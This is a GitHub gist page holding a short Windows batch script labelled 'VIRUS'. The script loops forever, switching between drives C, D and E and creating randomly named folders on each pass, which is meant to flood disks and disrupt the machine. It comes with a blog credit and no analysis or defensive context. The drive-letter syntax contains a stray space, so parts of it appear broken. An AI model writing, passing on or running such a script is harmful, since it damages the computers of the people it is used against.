Skip to content

Instantly share code, notes, and snippets.

@FiecyLick
Created February 2, 2018 15:28
Show Gist options
  • Save FiecyLick/f6d62482d1e3c1b4c6a8d192add78e24 to your computer and use it in GitHub Desktop.
Save FiecyLick/f6d62482d1e3c1b4c6a8d192add78e24 to your computer and use it in GitHub Desktop.
@echo off
:VIRUS
cd /d C :
md %RANDOM%
cd /d D :
md %RANDOM%
cd /d E :
md %RANDOM%
goto VIRUS
REM #######################
REM errorcode401.blogspot.in
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment